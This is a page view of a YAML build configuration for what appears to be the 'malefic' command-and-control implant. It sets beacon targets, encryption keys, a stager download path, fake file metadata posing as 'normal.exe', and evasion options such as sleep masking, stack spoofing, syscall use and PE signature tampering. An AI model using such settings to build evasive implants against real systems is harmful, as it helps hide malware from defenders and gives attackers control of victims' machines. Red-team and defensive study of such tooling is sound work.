-
Notifications
You must be signed in to change notification settings - Fork 23
/
config.yaml
89 lines (84 loc) · 2.01 KB
/
config.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
basic:
name: "malefic"
targets:
- "127.0.0.1:5001"
protocol: "tcp"
tls: false
proxy: ""
interval: 5
jitter: 0.2
ca: ""
encryption: aes
key: maliceofinternal
pulse:
flags:
start: 0x41
end: 0x42
magic: "beautiful"
artifact_id: 0
encryption: xor
key: "maliceofinternal"
target: 127.0.0.1:5002
protocol: "tcp"
http:
method: "POST"
path: "/pulse.bin"
version: "1.1"
headers:
User_Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
metadata:
remap_path: "C:/Windows/Users/Maleficarum"
icon: ""
compile_time: "24 Jun 2015 18:03:01"
file_version: ""
product_version: ""
company_name: ""
product_name: ""
original_filename: "normal.exe"
file_description: "normal"
internal_name: ""
implants:
mod: beacon
register_info: true
hot_load: true
modules:
- "full"
flags:
start: 0x41
end: 0x42
magic: "beautiful"
artifact_id: 0x1
apis:
# apis_level: "sys_apis", "nt_apis"
level: "nt_apis"
# apis_priority: "normal", "user_defined_dyanmic", "func_syscall" "syscalls"
priority:
normal:
enable: false
type: "normal"
dynamic:
enable: true
# type: "sys_dynamic", "user_defined_dynamic"
type: "user_defined_dynamic"
syscalls:
enable: false
# type: "func_syscall", "inline_syscall"
type: "inline_syscall"
alloctor:
# inprocess: "VirtualAlloc", "VirtualAllocEx",
# "VirtualAllocExNuma", "HeapAlloc",
# "NtMapViewOfSection", "NtAllocateVirtualMemory"
inprocess: "NtAllocateVirtualMemory"
# allocter_ex: "VirtualAllocEx", "NtAllocateVirtualMemory",
# "VirtualAllocExNuma", "NtMapViewOfSection"
crossprocess: "NtAllocateVirtualMemory"
sleep_mask: true
sacrifice_process: true
fork_and_run: false
hook_exit: true
thread_stack_spoofer: true
pe_signature_modify:
feature: true
modify:
magic: "\x00\x00"
signature: "\x00\x00"